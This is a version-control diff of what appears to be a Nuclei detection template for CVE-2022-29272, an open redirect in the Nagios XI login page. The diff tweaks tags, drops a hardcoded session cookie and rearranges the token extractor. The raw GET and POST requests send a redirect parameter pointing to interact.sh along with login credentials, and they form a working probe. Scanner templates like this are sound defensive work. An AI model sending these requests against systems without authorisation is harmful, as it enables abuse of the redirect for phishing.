Update CVE-2022-29272.yaml
parent
da868c0fb3
commit
8042eb160b
|
@ -11,20 +11,18 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2022-29272
|
||||
classification:
|
||||
cve-id: CVE-2022-29272
|
||||
tags: cve,cve2022,redirect,nagios
|
||||
tags: cve,cve2022,redirect,nagios,nagiosxi
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: nagiosxi=cvdde3p1b9gtr27pigi8l4fsb5
|
||||
|
||||
- |
|
||||
POST /nagiosxi/login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: nagiosxi=cvdde3p1b9gtr27pigi8l4fsb5
|
||||
|
||||
nsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login
|
||||
|
||||
|
@ -41,7 +39,7 @@ requests:
|
|||
part: body
|
||||
name: nsp_token
|
||||
group: 1
|
||||
internal: true
|
||||
regex:
|
||||
- '<input type="hidden" name="nsp" value="(.*)">'
|
||||
- "<input type='hidden' name='nsp' value='(.*)'>"
|
||||
internal: true
|
||||
|
|
Loading…
Reference in New Issue